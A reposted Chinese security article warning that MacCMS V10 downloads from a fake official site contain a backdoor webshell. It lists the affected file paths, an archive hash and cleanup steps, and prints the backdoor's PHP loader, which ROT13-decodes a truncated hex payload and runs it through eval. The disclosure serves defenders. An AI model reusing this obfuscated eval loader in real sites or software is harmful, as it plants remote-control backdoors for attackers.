安基网 首页 资讯 安全报 查看内容

苹果CMS/MacCMS V10后门WebShell,第三方下载注意

2019-11-5 09:30| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 苹果CMS是国内优秀的开源PHP建站系统,擅长电影程序影视系统这一块,在主流建站系统中特色鲜明,以灵活、小巧、兼容性好、负载强等优点而深受许多站长的喜爱。MacCMS后门Webshell某天始,MacCMS官网因为某些原因停摆。同时在百度搜索苹果CMS或MacCMS出现的排名第一均为一个:www.maccmsv ...

苹果CMS/MacCMS

苹果CMS是国内优秀的开源PHP建站系统,擅长电影程序影视系统这一块,在主流建站系统中特色鲜明,以灵活、小巧、兼容性好、负载强等优点而深受许多站长的喜爱。

MacCMS后门Webshell

某天始,MacCMS官网因为某些原因停摆。同时在百度搜索苹果CMS或MacCMS出现的排名第一均为一个:www.maccmsv10.com的网址,而真正的官网地址是www.maccms.com。前者使用了一个和maccms官网一模一样的静态首页提供程序下载。最近几天陆续有人发现了从这个网站下载的苹果CMS程序存在后门webshell。

无崖子直接从该第三方站点下载了源码,至今10月14日依然存在后门,所以基本可确信是故意搭建的假冒官网。

后门文件路径

  1. �6�7maccms10extendupyunsrcUpyunApiFormat.php
  2. �6�7maccms10extendQcloudSmsSms.php

MD5 (maccms10.zip) = 099e02dfa9d283e2891bce5bf9691643

最后修改日期都是:2019/6/12

error_reporting(E_ERROR);

@ini_set(‘display_errors’,‘Off’);

@ini_set(‘max_execution_time’,20000);

@ini_set(‘memory_limit’,‘256M’);

header(“content-Type: text/html; charset=utf-8”);

$password = “0d41c75e2ab34a3740834cdd7e066d90”;

function s(){

$str = “66756r6374696s6r207374…………”; //大马

$str = str_rot13($str);

m($str);

}

function m($str){

global $password;

$jj = ”;

eval($jj.pack(‘H*’,$str).$jj);

}

s();

?>

MacCMS后门Webshell

很坦诚的孩子,一目了然!!!

登录后主界面

有些资历的老黑可能一眼就看出来了,这是一个习科大马改进版。

修复

  1. 排查你的程序是否存在上面的后门路径文件
  2. 如果存在,删除后门文件,并进行全盘查杀扫描
  3. 手动查看可疑文件是存存在隐藏后门
  4. 检查服务器安全


小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6755621827210379787/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部